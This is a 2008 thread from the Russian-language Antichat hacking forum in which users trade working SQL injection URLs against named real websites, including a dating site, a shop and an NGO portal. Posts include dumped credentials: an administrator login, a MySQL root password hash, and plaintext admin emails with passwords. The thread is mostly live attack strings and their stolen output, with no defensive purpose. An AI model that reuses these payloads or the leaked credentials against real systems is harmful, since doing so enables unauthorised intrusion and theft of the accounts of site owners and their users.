ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5521  
Старый 23.05.2008, 19:31
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.thefrantics.com/
Код:
http://www.thefrantics.com/index.cfm?PID=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
 
Ответить с цитированием

  #5522  
Старый 23.05.2008, 19:51
mefish
Познающий
Регистрация: 13.04.2008
Сообщений: 42
Провел на форуме:
384537

Репутация: 35
Smile

to Assembler:

Цитата:
http://npo.karelia.ru/?view=event&id=0+union+select+1,concat_ws(0x3,vers ion(),user(),database()),3/*

http://npo.karelia.ru/?view=event&id=0+union+select+1,concat(u_name,0x3, u_pass),3+from+vs_users/*
http://npo.karelia.ru/admin

PS: и не фурыкает чет, мож кто абразумит почему
 
Ответить с цитированием

  #5523  
Старый 23.05.2008, 19:56
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Цитата:
Сообщение от mefish  
to Assembler:



http://npo.karelia.ru/admin

PS: и не фурыкает чет, мож кто абразумит почему
там бейсик авторризация. Скорее всего с базой не связано
 
Ответить с цитированием

  #5524  
Старый 23.05.2008, 20:04
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

2Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
Версия БД 5 - можно свободно извлечь таблицы и столбцы.
Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
Видим аккаунт администратора, где пароль в незашифрованном виде:
Код:
1:admin:nko:1
Вот и все... Получился даже мини-FAQ .

P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах!
 
Ответить с цитированием

  #5525  
Старый 23.05.2008, 20:17
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.goalqpc.com/ PR:5
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+version(),2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
root:*4148C7277489C55E5A3F49CD1D020FCBE8778C3A
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat_ws(0x3a,UserEmail,UserPassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+admin+limit+0,1/*
admin@goalqpc.com:deming123
support@newcastleweb.com:swissthins


Админка:
Цитата:
http://www.goalqpc.com/admin/
Юзеры:
Код:
http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat(useremail,0x3a,userpassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+8000,1/*
~8000 мемберов, пароли в открытом виде.
 
Ответить с цитированием

  #5526  
Старый 23.05.2008, 21:32
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Дом 3

Цитата:
http://www.dom3.ru/cgi-bin/dating.pl?action=search2&mode=html&se=-35'+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35+from+information_schema.tabl es/*&v1=18'&v2=19&re=57&fo=1&dom=1&x=16&y=12
мда
 
Ответить с цитированием

  #5527  
Старый 23.05.2008, 22:52
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Assembler  
А как можно посмотреть пароль и админку?
ОМГ убери пробелы из ссылки
Цитата:
Сообщение от gesik  
Можете ктонить помоч с http://www.proline.lv/lv/brandlines?brandID=1&confID=' там чтоли фильтр стоит?
Вывод:
_http://www.proline.lv/lv/brandlines?brandID=1&confID=-2+union+select+1,2,user(),4,version(),6,7,8,9,0,11 ,12,13,14/*
 
Ответить с цитированием

  #5528  
Старый 24.05.2008, 04:37
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.ask4ufe.com
Код:
http://www.ask4ufe.com/transcript.cfm?pid=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
 
Ответить с цитированием

  #5529  
Старый 24.05.2008, 04:42
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию

http://www.sequa.de Pr5
Код:
http://www.sequa.de/index.php?categ=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3/*&parent=0&p=downloads&area=1
 
Ответить с цитированием

  #5530  
Старый 24.05.2008, 06:47
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

CinemaBlend.Com

Цитата:
http://www.cinemablend.com/news.php?cid=1+union+select+1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ